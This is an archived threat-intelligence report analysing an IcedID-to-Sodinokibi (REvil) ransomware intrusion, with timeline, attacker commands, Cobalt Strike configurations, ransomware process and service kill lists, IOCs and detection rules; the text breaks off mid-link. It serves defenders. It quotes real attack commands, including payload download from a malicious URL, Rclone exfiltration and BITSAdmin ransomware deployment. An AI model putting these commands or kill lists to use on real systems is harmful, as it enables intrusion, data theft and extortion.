{
	"id": "51f92992-5537-4224-af42-59d2b9a62bf1",
	"created_at": "2026-04-06T00:12:41.347409Z",
	"updated_at": "2026-04-10T13:12:06.454Z",
	"deleted_at": null,
	"sha1_hash": "a630fbe16b63a3f1fc42a0254abc5e2b81238415",
	"title": "Sodinokibi (aka REvil) Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2453551,
	"plain_text": "Sodinokibi (aka REvil) Ransomware\r\nBy editor\r\nPublished: 2021-03-29 · Archived: 2026-04-05 21:23:21 UTC\r\nIntro\r\nSodinokibi (aka REvil) has been one of the most prolific ransomware as a service (RaaS) groups over the last couple of years.\r\nThe ransomware family was purported to be behind the Travelex intrusion and current reports point to an attack against Acer\r\nfor a reported $50 million ransom demand.\r\nIn March, we observed an intrusion which started with malicious spam that dropped IcedID (Bokbot) into the environment\r\nand subsequently allowed access to a group distributing Sodinokibi ransomware. During the intrusion the threat actors\r\nescalated privileges to Domain Administrator, exfiltrated data, and used Sodinokibi to ransom all domain joined systems.\r\nCase Summary\r\nThe IcedID trojan was first discovered in 2017 and currently operates as an initial access broker for several ransomware\r\nfamilies. In our intrusion, the threat actors leveraged malicious spam using an xlsm document which, upon opening and\r\nenabling the macro, initiated a wmic command to execute the IcedID trojan from a remote executable posing as a GIF\r\nimage.\r\nPersistence was set up using a scheduled task and discovery commands were initiated from the malware within minutes of\r\nexecution. About an hour and a half after initial access, the malware pulled down Cobalt Strike Beacons from 2 different\r\ncommand and control servers, which were both used throughout the intrusion. Once the Cobalt Strike Beacons were\r\nestablished, lateral movement began, first to an Exchange server, then pivoting to other servers. We did not see the attackers\r\ninteract with the Exchange application at all; and at first, it appeared the attack came from Exchange, but after careful\r\nreview, we assessed the source was indeed IcedID. #ArtifactsMatter. 
It appears the threat actors wanted us to believe\r\nExchange was the source of attack as they pivoted through Exchange to other systems in the domain using Cobalt Strike.\r\nAfter compromising the Exchange server, the attackers moved to domain controllers and other systems within the\r\nenvironment using SMB and PowerShell Beacons executed via a remote service. The attackers were slightly slowed down\r\nby AntiVirus, which ate a couple of Beacons, but the attackers eventually bypassed it using a variation of their lateral movement\r\ntechnique.\r\nAdditional discovery was executed from the domain controller using AdFind and the Ping utility to test connections between\r\nthe domain controller and other domain joined systems. After discovery was completed, credentials were dumped from\r\nlsass. After completing these tasks the threat actors began to establish RDP connections between various systems in the\r\ndomain.\r\nThree and a half hours into the intrusion, the threat actors used Rclone masquerading as a svchost executable to collect and\r\nexfiltrate the contents of network shares for use in a double extortion demand.\r\nAt the four-hour mark, the threat actors began to move on to final objectives. They staged the ransomware executable on a\r\ndomain controller and then used BITSAdmin to download it to each system in the domain. After that, the threat actors used\r\nRDP to open a cmd or PowerShell process to then execute the Sodinokibi ransomware using a particular flag, -smode, which,\r\nwhen executed, wrote a couple of RunOnce registry keys and then immediately rebooted the system into Safe Mode with\r\nNetworking. Encryption did not start immediately after reboot but required a user to log in, which in this case the threat\r\nactors completed by logging in after the reboot.\r\nBooting into Safe Mode with Networking blocked the startup of security tools and other management agents. 
Networking\r\nworked, but because services couldn’t start, we were unable to remotely manage the systems using our normal tools. We\r\nbelieve this process would have stopped some EDR agents from starting up and possibly detecting the ransomware\r\nexecution.\r\nOn certain systems, ransomware was executed without the -smode flag, and on other systems a dll was executed via\r\nrundll32 to encrypt the system without requiring a reboot and allowing the threat actors to remain present while the\r\nencryption process completed.\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 1 of 27\n\nAbout 4.5 hours after initial access, the threat actors had completed their mission of encrypting all domain joined systems.\r\nThe ransomware note left by the infection included a link to their site on Tor which put the price tag for decryption around\r\n$200k if paid within 7 days. If we didn’t pay within 7 days the price went up to around $400k. The ransom was required to be\r\npaid in Monero instead of the usual Bitcoin. This may be in an effort to better shield the payments from tracing activity like\r\nthose performed by Chainalysis. 
The threat actors identified themselves on their site as Sodinokibi and linked to a Coveware\r\nblog to provide assurance that, if paid, their decryption would be successful.\r\nServices\r\nOur Threat Feed service picked up one of the two Cobalt Strike servers one day before this intrusion occurred and the other\r\nIP was added to the feed as soon as we recognized it.\r\nWe also have artifacts available from this case such as ransomware samples (dll and exe), pcaps, memory captures, files,\r\nKape packages and more, under our Security Researcher and Organization services.\r\nTimeline\r\nMITRE ATT\u0026CK\r\nInitial Access\r\nInitial access for this intrusion was via a malspam campaign; while expecting Qbot downloads, we found that IcedID was the\r\npayload choice delivered this time, similar to activity noted recently by James Quinn.\r\nThe delivery format was an xlsm file:\r\nInitial execution of the document writes a file to:\r\nC:\\Users\\Public\\microsoft.security\r\nThe Excel file called wmic to execute the file with regsvr32:\r\nwmic.exe process call create 'regsvr32 -s C:\\Users\\Public\\microsoft.security'\r\nThis then made a network request to download a file from this URL:\r\nhttp://vpu03jivmm03qncgx.com/index.gif\r\nThe GIF, however, was the IcedID malware.\r\nExecution\r\nOnce IcedID was downloaded to the host, the malware was executed using rundll32.exe:\r\nrundll32.exe \"C:\\Users\\USERNAME\\AppData\\Local\\Temp\\skull-x64.dat\",update /i:\"DwarfWing\\license.dat\"\r\nAfter execution, the malware made contact with 161.35.109[.]168, which it continued to beacon to throughout the intrusion.\r\nPersistence\r\nIcedID set up persistence on the beachhead host using a scheduled 
task.\r\nwewouwquge_{A3112501-520A-8F32-871A-380B92917B3D}\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\wewouwquge_{A3112501-5\r\nThe execution of the ransomware executable created a RunOnce key for persistence.\r\nHKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*AstraZeneca\r\nPrivilege Escalation\r\nAfter completing LDAP discovery (BloodHound), the Cobalt Strike Beacon running in the wuauclt.exe process executed\r\nseveral PowerShell functions for UAC bypasses including:\r\nUAC-TokenMagic\r\nInvoke-SluiBypass\r\nDefense Evasion\r\nAbout one and a half hours after initial access, IcedID reached out to two Cobalt Strike servers.\r\nProcess injection was used multiple times across the environment using Cobalt Strike Beacons.\r\nPrior to executing the ransomware, the threat actors created a GPO to disable Windows Defender across all systems/OUs.\r\nThe GPO was named “new”.\r\nCredential Access\r\nCredentials were dumped on a server and domain controller using a Cobalt Strike Beacon.\r\nDiscovery\r\nInitial discovery by the IcedID malware occurred within minutes of execution:\r\ncmd.exe /c chcp \u003e\u00262\r\nWMIC.exe WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:List\r\nipconfig.exe ipconfig /all\r\nsysteminfo\r\nnet config workstation\r\nnltest /domain_trusts\r\nnltest /domain_trusts /all_trusts\r\nnet view /all /domain\r\nnet view /all\r\nnet.exe net group \"Domain Admins\" /domain\r\nA flurry of LDAP queries was seen coming from wuauclt.exe (Cobalt Strike) on the beachhead.\r\n\"DistinguishedName\": \"CN=Terminal Server License 
Servers,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\":\r\n\"DistinguishedName\": \"CN=RAS and IAS Servers,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"Searc\r\n\"DistinguishedName\": \"CN=Incoming Forest Trust Builders,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"\r\n\"DistinguishedName\": \"CN=Account Operators,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"Searc\r\n\"DistinguishedName\": \"CN=Cert Publishers,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"SearchFil\r\n\"DistinguishedName\": \"CN=Server Operators,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"Search\r\n\"DistinguishedName\": \"CN=Storage Replica Administrators,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"\r\n\"DistinguishedName\": \"CN=Hyper-V Administrators,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"\r\n\"DistinguishedName\": \"CN=Remote Management Users,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\",\r\n\"DistinguishedName\": \"CN=Access Control Assistance Operators,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearc\r\n\"DistinguishedName\": \"CN=RDS Management Servers,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"\r\n\"DistinguishedName\": \"CN=RDS Endpoint Servers,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"Se\r\n\"DistinguishedName\": \"CN=Event Log Readers,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"Searc\r\n\"DistinguishedName\": \"CN=RDS Remote Access Servers,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\"\r\n\"DistinguishedName\": \"CN=Certificate Service DCOM Access,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\":\r\n\"DistinguishedName\": \"CN=Performance Log Users,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", 
\"S\r\n\"DistinguishedName\": \"CN=Cryptographic Operators,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\",\r\n\"DistinguishedName\": \"CN=Distributed COM Users,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"S\r\n\"DistinguishedName\": \"CN=Network Configuration Operators,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\":\r\n\"DistinguishedName\": \"CN=Performance Monitor Users,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\"\r\n\"DistinguishedName\": \"CN=Remote Desktop Users,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"Se\r\n\"DistinguishedName\": \"CN=Replicator,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"SearchFilter\r\n\"DistinguishedName\": \"CN=Backup Operators,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"Search\r\n\"DistinguishedName\": \"CN=Print Operators,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"SearchF\r\n\"DistinguishedName\": \"CN=Infra,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"SearchFilter\": \"member=*\" }\r\n\"DistinguishedName\": \"CN=ExchangeLegacyInterop,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\",\r\n\"DistinguishedName\": \"CN=Security Administrator,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\"\r\n\"DistinguishedName\": \"CN=Security Reader,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\", \"Scope\r\n\"DistinguishedName\": \"CN=Compliance Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\",\r\n\"DistinguishedName\": \"CN=Discovery Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\", \"\r\n\"DistinguishedName\": \"CN=Hygiene Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\", \"Sc\r\n\"DistinguishedName\": \"CN=Delegated Setup,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\", \"Scope\r\n\"DistinguishedName\": \"CN=Records Management,OU=Microsoft 
Exchange Security Groups,DC=DomainName,DC=local\", \"Sc\r\n\"DistinguishedName\": \"CN=Help Desk,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\", \"ScopeOfSear\r\n\"DistinguishedName\": \"CN=UM Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\", \"ScopeOf\r\n\"DistinguishedName\": \"CN=Public Folder Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\r\n\"DistinguishedName\": \"CN=View-Only Organization Management,OU=Microsoft Exchange Security Groups,DC=DomainName\r\n\"DistinguishedName\": \"CN=DnsUpdateProxy,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"SearchFilt\r\n\"DistinguishedName\": \"CN=Recipient Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\", \"\r\n\"DistinguishedName\": \"CN=Protected Users,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"SearchFil\r\n\"DistinguishedName\": \"CN=Cloneable Domain Controllers,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\r\n\"DistinguishedName\": \"CN=Enterprise Key Admins,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"Sea\r\n\"DistinguishedName\": \"CN=Key Admins,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"SearchFilter\"\r\n\"DistinguishedName\": \"CN=Domain Guests,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"SearchFilte\r\n\"DistinguishedName\": \"CN=Enterprise Read-only Domain Controllers,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSea\r\n\"DistinguishedName\": \"CN=Read-only Domain Controllers,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\r\n\"DistinguishedName\": \"CN=Domain Computers,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"SearchFi\r\n\"DistinguishedName\": \"CN=Domain Users,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"SearchFilter\r\n\"DistinguishedName\": \"CN=Domain Controllers,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"Search\r\nWe 
believe that activity was related to a BloodHound scan, as seconds later we saw BloodHound results dropped to disk\r\nbefore being deleted.\r\nOnce on the Exchange server in the environment, the threat actor performed DNS requests for all domain joined systems and\r\npinged a few to check connectivity.\r\nAdFind was executed on a domain controller to gather additional info such as name, OS, and DNS name.\r\ncmd.exe /C adfind.exe -f objectcategory=computer -csv name cn OperatingSystem dNSHostName \u003e some.csv\r\nLateral Movement\r\nFor lateral movement, the threat actors used various techniques across the domain, one method being Cobalt Strike.\r\nCobalt Strike Beacon executables were transferred using SMB and executed via a remote service.\r\nOn other systems, PowerShell was used with the same remote service execution.\r\nTo facilitate the final ransomware deployment, RDP connections were initiated from a domain controller as well as a\r\nsecondary server in the environment.\r\nCollection\r\nThe Rclone utility was used to collect information from file shares and to exfiltrate the data.\r\nsvchost.exe --config svchost.conf --progress --no-check-certificate copy \"\\\\ServerName\\C$\\ShareName\" ftp1:/Do\r\nCommand and Control\r\nIcedID:\r\ncikawemoret34.space\r\n206.189.10.247:80\r\nnomovee.website\r\n161.35.109.168:443\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ec74a5c51106f0419184d0dd08fb05bc\r\nCertificate: [e0:fc:e5:eb:fd:e7:da:0b:93:ac:dc:df:0d:e8:56:cc:7b:f2:58:43]\r\nNot Before: 2021/03/11 02:06:51\r\nNot After: 2022/03/11 02:06:51\r\nIssuer Org: Internet Widgits Pty Ltd\r\nSubject Common: 
localhost\r\nSubject Org: Internet Widgits Pty Ltd\r\nPublic Algorithm: rsaEncryption\r\nCobalt Strike:\r\n45.86.163.78:443\r\ncloudmetric.online\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nCertificate: [b9:2c:48:71:1a:ba:eb:99:15:c4:0b:b0:31:ce:14:8e:a9:30:ac:d3]\r\nNot Before: 2021/02/27 06:45:42\r\nNot After: 2021/05/28 07:45:42\r\nIssuer Org: Let's Encrypt\r\nSubject Common: cloudmetric.online [cloudmetric.online]\r\nPublic Algorithm: rsaEncryption\r\nCobalt Config:\r\n{\r\n\"x64\": {\r\n\"config\": {\r\n\"HTTP Method Path 2\": \"/jquery-3.2.2.full.js\",\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Method 2\": \"POST\",\r\n\"Polling\": 48963,\r\n\"Jitter\": 24,\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\WUAUCLT.exe\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\WUAUCLT.exe\",\r\n\"Method 1\": \"GET\",\r\n\"C2 Server\": \"cloudmetric.online,/jquery-3.2.2.min.js,45.86.163.78,/jquery-3.2.2.min.js\",\r\n\"Port\": 80\r\n},\r\n\"sha256\": \"8d44894c09a2e30b40927f8951e01708d0a600813387c3c0872bcd6cb10a3e8c\",\r\n\"sha1\": \"deab6be62e9c9793f9874bbdec9ff0a3acb82ad8\",\r\n\"md5\": \"28ceee1f8f529a80bd0ff5e52240e404\",\r\n\"time\": 1615840900656.6\r\n},\r\n\"x86\": {\r\n\"config\": {\r\n\"HTTP Method Path 2\": \"/jquery-3.2.2.full.js\",\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Method 2\": \"POST\",\r\n\"Polling\": 48963,\r\n\"Jitter\": 24,\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\WUAUCLT.exe\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\WUAUCLT.exe\",\r\n\"Method 1\": \"GET\",\r\n\"C2 Server\": \"cloudmetric.online,/jquery-3.2.2.min.js,45.86.163.78,/jquery-3.2.2.min.js\",\r\n\"Port\": 80\r\n},\r\n\"sha256\": \"11af3609884ad674a1c86f42ec27719094e935d357d73e574b75c787a0e8c0f1\",\r\n\"sha1\": \"a30de5ca8a107fd69c8885a975224ea8ff261002\",\r\n\"md5\": \"bbc6592c67d233640a9ca0d0d915003c\",\r\n\"time\": 
1615840895189\r\n}\r\n}\r\n195.189.99.74\r\nsmalleststores.com\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nCertificate: [14:f4:79:e3:fd:98:21:60:68:fd:1c:0a:e6:c6:f9:71:f4:ac:f9:df]\r\nNot Before: 2021/03/11 11:02:43\r\nNot After: 2021/06/09 12:02:43\r\nIssuer Org: Let's Encrypt\r\nSubject Common: smalleststores.com [smalleststores.com]\r\nPublic Algorithm: rsaEncryption\r\nCobalt Config:\r\n{\r\n\"x86\": {\r\n\"config\": {\r\n\"Method 1\": \"GET\",\r\n\"Method 2\": \"GET\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\mstsc.exe\",\r\n\"C2 Server\": \"smalleststores.com,/owa/,195.189.99.74,/owa/\",\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Polling\": 59713,\r\n\"Jitter\": 41,\r\n\"Port\": 443,\r\n\"Spawn To x64\": \"%windir%\\\\system32\\\\calc.exe\",\r\n\"HTTP Method Path 2\": \"/OWA/\"\r\n},\r\n\"md5\": \"88365eb3d504f570f22d76f777ab2caf\",\r\n\"sha256\": \"4b25f708c506e0cc747344ee79ecda48d51f6c25c9cb45ceb420575458f56720\",\r\n\"sha1\": \"f42f2eea6cf88d30cfd6207182528be6ae2e504f\",\r\n\"time\": 1615846680369.8\r\n},\r\n\"x64\": {\r\n\"config\": {\r\n\"Method 1\": \"GET\",\r\n\"Method 2\": \"GET\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\mstsc.exe\",\r\n\"C2 Server\": \"smalleststores.com,/owa/,195.189.99.74,/owa/\",\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Polling\": 59713,\r\n\"Jitter\": 41,\r\n\"Port\": 443,\r\n\"Spawn To x64\": \"%windir%\\\\system32\\\\calc.exe\",\r\n\"HTTP Method Path 2\": \"/OWA/\"\r\n},\r\n\"md5\": \"27ca24a7f6d02539235d46e689e6e4ac\",\r\n\"sha256\": \"e35c31ba3e10f59ae7ea9154e2c0f6f832fcff22b959f65b607d6ba0879ab641\",\r\n\"sha1\": \"6885d84c1843c41ff8197d7ab0c8e42e20a7ecaa\",\r\n\"time\": 1615846684589\r\n}\r\n}\r\nExfiltration\r\nData that was collected from the domain was exfiltrated to a remote server at:\r\nImpact\r\nFor the final actions, the threat actors dropped a ransomware executable on the 
domain controller in C:\\Windows and then\r\nused BITSAdmin to deploy the executable to remote systems.\r\nC:\\Windows\\system32\\bitsadmin.exe /transfer debjob /download /priority normal \\\\DOMIANCONTROLLER\\c$\\windows\\DO\r\nThe -smode flag was used with the ransomware executable to set the system to reboot into Safe Mode with Networking as\r\nnoted by Malwarehunterteam.\r\nSee below for -smode execution:\r\nThe *franceisshit key was used to boot the machine out of Safe Mode upon restarting the machine.\r\nThe systems rebooted into Safe Mode with Networking after running this smode command and were left at a login screen.\r\nAbout 10-20 seconds after logging in, all user files were encrypted and a ransom note was placed in numerous locations\r\nincluding the Desktop. Services were not able to be started, which led to collection issues, as normal agents did not start.\r\nThis also included the startup of EDR and management agents.\r\nWe’ve seen at least one tweet about smode setting auto login keys, but we did not see that in our case and were not able to\r\nrecreate that situation.\r\nAfter rebooting out of Safe Mode, you are left with the following desktop:\r\nOn certain systems, like the domain controllers, the threat actors chose to not use the Safe Mode option, and instead they\r\nused a dll executed by rundll32 to encrypt the system with no reboot, allowing the threat actors to maintain access while the\r\nransomware was encrypting files.\r\n\"C:\\Windows\\system32\\rundll32.exe\" C:\\Windows\\DomainName.dll,DllRegisterServer\r\nThe threat actors asked for 200k in Monero. They were talked down 20-30% and could have been talked down more. 
Here are\r\na few screenshots from the website.\r\nWith the help of @hatching_io (https://tria.ge/) we were able to parse the config from the ransomware sample.\r\nCampaign ID (sub): 7114\r\nnet: false\r\nList of processes to kill (prc)\r\noracle\r\nklnagent\r\nmydesktopqos\r\ninfopath\r\nBackupExtender\r\npowerpnt\r\noutlook\r\nBackupAgent\r\nSmc\r\nsql\r\nccSvcHst\r\nBackupUpdater\r\nRtvscan\r\nwinword\r\nkavfsscs\r\nocssd\r\nisqlplussvc\r\nvisio\r\nShadowProtectSvc\r\ntbirdconfig\r\nTSSchBkpService\r\ndbeng50\r\nccSetMgr\r\nagntsvc\r\nSage.NA.AT_AU.SysTray\r\ndbsnmp\r\nthebat\r\nonenote\r\nAmitiAvSrv\r\nwordpad\r\nmsaccess\r\navgadmsv\r\nthunderbird\r\nBackupMaint\r\nMicrosoft.exchange.store.worker.exe\r\nCarboniteUI\r\nexcel\r\nSPBBCSvc\r\nLogmeInBackupService\r\nencsvc\r\nocomm\r\nsqbcoreservice\r\nNSCTOP\r\nmydesktopservice\r\nkavfs\r\nkavfswp\r\nocautoupds\r\nmspub\r\nxfssvccon\r\nDLOAdminSvcu\r\nsynctime\r\nlmibackupvssservice\r\nfirefox\r\nsteam\r\ndlomaintsvcu\r\nList of services to kill\r\nTelemetryserver\r\n\"Sophos AutoUpdate Service\"\r\nsophos\r\nAltaro.Agent.exe\r\nmysqld\r\nMSSQL$MSGPMR\r\n\"SophosFIM\"\r\n\"Sophos Web Control Service\"\r\nSQLWriter\r\nsvcGenericHost\r\nAltiBack\r\n\"SQLServer Analysis Services (MSSQLSERVER)\"\r\nBackupExecAgentAccelerator\r\n\"StorageCraft ImageReady\"\r\nSQLTELEMETRY\r\nAzureADConnectAuthenticationAgent\r\nntrtscan\r\nds_notifier\r\nTeamViewer\r\n\"StorageCraft Raw Agent\"\r\n\"StorageCraft Shadow Copy 
Provider\"\r\nSQLTELEMETRY$SQLEXPRESS\r\nVeeamHvIntegrationSvc\r\nAltiCTProxy\r\nMsDtsServer130\r\nViprePPLSvc\r\nMcAfeeFramework\r\nMSSQL$QM\r\n\"swi_service\"\r\n\"ThreadLocker\"\r\nofcservice\r\nAUService\r\nsophossps\r\nAzureADConnectHealthSyncMonitor\r\nAltaro.OffsiteServer.UI.Service.exe\r\n\"SAVAdminService\"\r\nds_monitor\r\nALTIVRM\r\nSSASTELEMETRY\r\nTmCCSF\r\nMsDtsServer110\r\n\"Sophos MCS Client\"\r\nTMBMServer\r\nSBAMSvc\r\nmfewc\r\n\"Sophos System Protection Service\"\r\nMSSQLFDLauncher$TESTBACKUP02DEV\r\nVeeamDeploymentService\r\nmasvc\r\nbackup\r\nMSSQL$SQLEXPRESS\r\nAltiPhoneServ\r\nMSSQLServerOLAPService\r\nSSISTELEMETRY130\r\nVeeamEndpointBackupSvc\r\nmepocs\r\nAltaro.UI.Service.exe\r\n\"ds_agent\"\r\nHuntressUpdater\r\nMSSQLFDLauncher\r\n\"Sophos File Scanner Service\"\r\nSQLAgent$MSGPMR\r\nADSync\r\nKaseyaAgent\r\nReportServer\r\nMSSQLFDLauncher$SQLEXPRESS\r\nMSSQL$HPWJA\r\nKaseyaAgentEndpoint\r\nVeeamTransportSvc\r\n\"ds_monitor\"\r\nmfevtp\r\nMSSQLTESTBACKUP02DEV\r\nSQLTELEMETRY$MSGPMR\r\nThreadLocker\r\nMSSQLServerADHelper100\r\nveeam\r\ntmlisten\r\nAzureADConnectHealthSyncInsights\r\n\"swi_filter\"\r\nMsDtsServer120\r\nProtectedStorage\r\nVeeamDeploySvc\r\nmemtas\r\nds_agent\r\nVeeamMountSvc\r\nHuntressAgent\r\nSQLAgent$SQLEXPRESS\r\nbedbg\r\nMSSQLSERVER\r\n\"ofcservice\"\r\nVipreAAPSvc\r\n\"Sophos Endpoint Defense Service\"\r\nKACHIPS906995744173948\r\nDsSvc\r\nMSSQLLaunchpad$SQLEXPRESS\r\nmsseces\r\nmacmnsvc\r\nLTService\r\nCode42Service\r\nAltaro.HyperV.WAN.RemoteService.exe\r\nLTSvcMon\r\nMSSQL$SQLEXPRESSADV\r\n\"SAVService\"\r\nAltaro.OffsiteServer.Service.exe\r\n\"Sage 100cloud Advanced 2020 (9920)\"\r\nAltaro.SubAgent.exe\r\nmfemms\r\n\"TeamViewer\"\r\n\"SQLServer Reporting Services (MSSQLSERVER)\"\r\nVSS\r\nsql\r\nAltaro.SubAgent.N2.exe\r\n\"SQLServer Integration Services 12.0\"\r\nSQLSERVERAGENT\r\nvss\r\n\"Sophos Safestore 
Service\"\r\nklnagent\r\n\"Sage.NA.AT_AU.Service\"\r\nMBAMService\r\n\"Sophos Health Service\"\r\nSQLBrowser\r\nMySQL\r\n\"ProtectedStorage\"\r\n\"Sophos Clean Service\"\r\n\"Sage 100c Advanced 2017 (9917)\"\r\n\"SntpService\"\r\nVeeamNFSSvc\r\nKAVFS\r\nSQLEXPRESSADV\r\nKAENDCHIPS906995744173948\r\nsppsvc\r\nAmsp\r\npsqlWGE\r\nMicrosoft.exchange.store.worker.exe\r\nkavfsscs\r\n\"Amsp\"\r\nsqlservr\r\nAltaro.DedupService.exe\r\nsvc$\r\n\"ds_notifier\"\r\n\"Sophos Device Control Service\"\r\nAzureADConnectAgentUpdater\r\nAltiFTPUploader\r\n\"Sophos MCS Agent\"\r\nTriage sandbox run of the executable without smode:\r\nIOCs\r\nNetwork\r\n45.86.163.78|80\r\n45.86.163.78|443\r\n45.86.163.78|8080\r\n195.189.99.74|80\r\n195.189.99.74|443\r\n195.189.99.74|8080\r\n206.189.10.247|80\r\n161.35.109.168|443\r\nsmalleststores.com\r\ncloudmetric.online\r\ncikawemoret34.space\r\nnomovee.website\r\nFile\r\nskull-x64.dat\r\n5c3a6978bb960d8fbccd117ddcc3ca10\r\n17424cfeb756e231bea6d1363151a83af142ba6f\r\n59a2a5fae1c51afbbf1bf8c6eb0a65cb2b8575794e3890f499f8935035e633fc\r\nCiocca.dll\r\n296f1098a3a8cfb7e07808ee08361495\r\n7d903f87fd305f1c93ec420848fd6e5aeb018d59\r\nb1b00f7b065e8c013e0c23c0f34707819e0d537dbe2e83d0d023a11a0ca6b388\r\nlicense.dat\r\n6f208841cfd819c29a7cbc0a202bd7a3\r\n0febc376cc066bb668f1a80b969ed112da8e871c\r\n45b6349ee9d53278f350b59d4a2a28890bbe9f9de6565453db4c085bb5875865\r\nDomainName.dll\r\nc8fab46c4fd61c5f138fb151638c35e1\r\nc4830cbf3a3044f6e50cd60127ff5681f8ee4bbf\r\n64076294e761cee0ce7d7cd28dae05f483a711eafe47f94fe881ac3980abfd8f\r\nDomainName.exe\r\naf94ccb62f97700115a219c4b7626d22\r\nbb67edcfe4e5b6fe09ee96e5b8ace7a4cfe39eb7\r\n2896b38ec3f5f196a9d127dbda3f44c7c29c844f53ae5f209229d56fd6f2a59c\r\nsvchost.exe 
(rclone)\r\nfcfcf1e45e8d5cdca0450b8dc90754b68e8e4673\r\n538078ab6d80d7cf889af3e08f62c4e83358596f31ac8ae8fbc6326839a6bfe5\r\nAdFind.exe\r\ncb198869ca3c96af536869e71c54dd9d83afbee6\r\n56de41fa0a94fa7fff68f02712a698ba2f0a71afcecb217f6519bd5751baf3ed\r\nDetections\r\nNetwork\r\nETPRO TROJAN Cobalt Strike Malleable C2 JQuery Custom Profile M2\r\nET DNS Query to a *.top domain\r\nET POLICY OpenSSL Demo CA - Internet Widgits Pty\r\nSigma\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_powershell_enc_cmd.yml\r\nhttps://github.com/Neo23x0/sigma/blob/084cd39505861188d9d8f2d5c0f2835e4f750a3f/rules/windows/process_creation/win_malware_trickbot_r\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_commands_recon_activity.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/network_connection/sysmon_rundll32_net_connections.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_adfind.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_wmi_execution.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/a08571be9107d1c0e216400ffbb89